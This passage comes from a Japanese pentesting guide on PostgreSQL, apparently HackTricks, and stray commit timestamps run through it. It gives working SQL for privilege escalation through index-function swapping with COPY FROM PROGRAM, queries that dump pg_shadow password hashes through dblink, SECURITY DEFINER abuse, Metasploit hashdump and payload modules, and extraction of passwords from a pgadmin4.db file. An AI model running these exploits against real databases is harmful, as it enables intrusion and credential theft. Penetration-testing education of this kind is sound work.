PostgreSQLでは、このフローは次のようになります
2022-10-08 16:35:25 +00:00
```sql
CREATE TABLE temp_table (data text);
CREATE TABLE shell_commands_results (data text);
2023-07-07 23:42:27 +00:00
2022-10-08 16:35:25 +00:00
INSERT INTO temp_table VALUES ('dummy content');
2023-07-07 23:42:27 +00:00
/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */
2022-10-08 16:35:25 +00:00
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
2023-07-07 23:42:27 +00:00
LANGUAGE sql IMMUTABLE AS 'select ''nothing'';';
2022-10-08 16:35:25 +00:00
CREATE INDEX index_malicious ON public.temp_table (suid_function(data));
2023-07-07 23:42:27 +00:00
2022-10-08 16:35:25 +00:00
ALTER TABLE temp_table OWNER TO cloudsqladmin;
2023-07-07 23:42:27 +00:00
/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */
2022-10-08 16:35:25 +00:00
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
2023-07-07 23:42:27 +00:00
LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';
2022-10-08 16:35:25 +00:00
ANALYZE public.temp_table;
```
2023-07-07 23:42:27 +00:00
実行したエクスプロイトSQLクエリの後、`shell_commands_results`テーブルには実行されたコードの出力が含まれています。
2022-10-08 16:35:25 +00:00
```
uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
```
2023-07-07 23:42:27 +00:00
### ローカルログイン
2022-10-08 16:35:25 +00:00
一部の設定ミスのあるPostgreSQLインスタンスでは、任意のローカルユーザーのログインが許可される場合があります。**`dblink`関数**を使用して、127.0.0.1からローカルログインすることが可能です。
2022-11-08 21:47:24 +00:00
```sql
2022-12-21 00:29:12 +00:00
\du * # Get Users
\l # Get databases
2022-11-08 21:47:24 +00:00
SELECT * FROM dblink('host=127.0.0.1
2023-07-07 23:42:27 +00:00
port=5432
user=someuser
password=supersecret
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
2022-12-21 00:29:12 +00:00
RETURNS (result TEXT);
2022-11-08 21:47:24 +00:00
```
2022-12-21 00:29:12 +00:00
{% hint style="warning" %}
2023-07-07 23:42:27 +00:00
前のクエリが動作するためには、**`dblink`関数が存在する必要があります**。存在しない場合は、以下のコマンドで作成してみることができます。
2022-12-21 00:29:12 +00:00
```sql
CREATE EXTENSION dblink;
```
{% endhint %}
2023-07-07 23:42:27 +00:00
もし特権を持つユーザーのパスワードを持っているが、そのユーザーは外部IPからのログインが許可されていない場合、以下の関数を使用してそのユーザーとしてクエリを実行することができます。
2022-11-08 21:47:24 +00:00
```sql
SELECT * FROM dblink('host=127.0.0.1
2023-07-07 23:42:27 +00:00
user=someuser
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
2023-07-07 23:42:27 +00:00
RETURNS (result TEXT);
2022-11-08 21:47:24 +00:00
```
2023-07-07 23:42:27 +00:00
この関数が存在するかどうかを確認することができます。以下の方法で確認できます。
2022-11-08 21:47:24 +00:00
```sql
SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;
```
2023-07-07 23:42:27 +00:00
### **SECURITY DEFINERを持つカスタム定義関数**
[この解説記事](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql)では、IBMが提供するPostgreSQLインスタンス内で、ペンテスターが**SECURITY DEFINERフラグを持つこの関数**を見つけたため、特権昇格が可能になりました。
<pre class="language-sql"><code class="lang-sql">CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
LANGUAGE 'plpgsql'
<strong> VOLATILE SECURITY DEFINER
</strong> PARALLEL UNSAFE
COST 100
AS $BODY$
DECLARE
persist_dblink_extension boolean;
BEGIN
persist_dblink_extension := create_dblink_extension();
PERFORM dblink_connect(format('dbname=%s', db_name));
PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
PERFORM dblink_disconnect();
2022-12-24 11:52:08 +00:00
</code></pre>
2023-07-07 23:42:27 +00:00
[ドキュメントで説明されているように](https://www.postgresql.org/docs/current/sql-createfunction.html)、**SECURITY DEFINERを持つ関数は**、それを所有するユーザーの特権で実行されます。したがって、関数が**SQLインジェクションの脆弱性を持っている**か、攻撃者が制御するパラメータで**特権のあるアクションを実行している**場合、PostgreSQL内で特権昇格が悪用される可能性があります。
2022-12-20 15:51:45 +00:00
2023-07-07 23:42:27 +00:00
前のコードの4行目で、関数には**SECURITY DEFINER**フラグがあることがわかります。
2022-12-20 15:51:45 +00:00
```sql
2023-07-07 23:42:27 +00:00
CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
2022-12-20 15:51:45 +00:00
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
```
2023-07-07 23:42:27 +00:00
そして、**コマンドを実行**します:
2022-12-20 15:51:45 +00:00
<figure><img src="../.gitbook/assets/image (9) (1).png" alt=""><figcaption></figcaption></figure>
2022-12-20 15:51:45 +00:00
### PL/pgSQLを使用したパスワードのブルートフォース攻撃
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
PL/pgSQLは、**完全な機能を備えたプログラミング言語**であり、SQLよりもはるかに手続き的な制御が可能です。ループや他の制御構造を使用することができます。SQL文やトリガーは、PL/pgSQL言語で作成された関数を呼び出すことができます。\
**この言語を悪用して、PostgreSQLにユーザーの資格情報をブルートフォース攻撃させることができます。**
2022-12-20 18:10:20 +00:00
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md" %}
[pl-pgsql-password-bruteforce.md](../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md)
{% endcontent-ref %}
2022-05-01 13:25:53 +00:00
## **POST**
2021-11-12 01:11:08 +00:00
```
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload
```
2023-07-07 23:42:27 +00:00
### ロギング
_**postgresql.conf**_ ファイルの中で、以下の設定を変更することで、PostgreSQL のログを有効にすることができます。
```bash
log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
logging_collector = on
sudo service postgresql restart
#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
#or in /var/lib/postgresql/<PG_Version>/main/pg_log/
```
次に、**サービスを再起動**してください。
2022-05-01 13:25:53 +00:00
### pgadmin
2023-07-07 23:42:27 +00:00
[pgadmin](https://www.pgadmin.org)は、PostgreSQLの管理および開発プラットフォームです。\
_**pgadmin4.db**_ファイルの中には**パスワード**が含まれています。\
スクリプト内の_decrypt_関数を使用して、それらを復号化することができます[https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
```bash
sqlite3 pgadmin4.db ".schema"
sqlite3 pgadmin4.db "select * from user;"
sqlite3 pgadmin4.db "select * from server;"
string pgadmin4.db
```
2022-10-07 12:55:24 +00:00
### pg\_hba
クライアント認証は、_**pg\_hba.conf**_ という名前の設定ファイルで制御されます。このファイルには、いくつかのレコードがあります。レコードは次の7つの形式のいずれかを持つことができます。
2022-10-07 14:00:19 +00:00
![](https://lh4.googleusercontent.com/Ff8YbD3ppYmN2Omp-4M-0AAVhLsr4c2i7d7HUjgkE-O6NZ5zbaST1hdMPrp1AL\_xTXJalYe0HYxUk76vWJUfHZ5GuCDvIL1A-sMV44Z0CYSVgLM9ttFTDu-BhzewBGc7FeMarTLqsu\_N1ztXJg)
2023-07-07 23:42:27 +00:00
**各**レコードは、**接続タイプ**、**クライアントのIPアドレス範囲**(接続タイプに関連する場合)、**データベース名**、**ユーザ名**、およびこれらのパラメータに一致する接続に使用される**認証方法**を指定します。認証を実行するためには、一致する接続タイプ、クライアントアドレス、要求されたデータベース、およびユーザ名を持つ**最初のレコードが使用されます**。 "フォールスルー"や"バックアップ"はありません:**1つのレコードが選択され、認証が失敗した場合、後続のレコードは考慮されません**。一致するレコードがない場合、アクセスは拒否されます。\
パスワードベースの認証方法は、**md5**、**crypt**、および**password**です。これらの方法は、パスワードが接続を介して送信される方法を除いて、同様に動作しますそれぞれ、MD5ハッシュ、crypt暗号化、およびクリアテキストです。制限として、cryptメソッドはpg\_authidで暗号化されたパスワードでは機能しません。
2022-10-07 12:55:24 +00:00
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
* **サイバーセキュリティ企業で働いていますか?** HackTricksであなたの会社を宣伝したいですかまたは、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたりしたいですか[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[NFT](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローしてください**。
* **ハッキングのトリックを共有するには、**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **および** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください**
2022-04-28 16:01:33 +00:00
</details>
2022-08-31 22:35:39 +00:00
2022-09-30 10:43:59 +00:00
![](<../.gitbook/assets/image (9) (1) (2).png>)
2022-08-31 22:35:39 +00:00
\
2023-07-07 23:42:27 +00:00
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。\
今すぐアクセスを取得:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}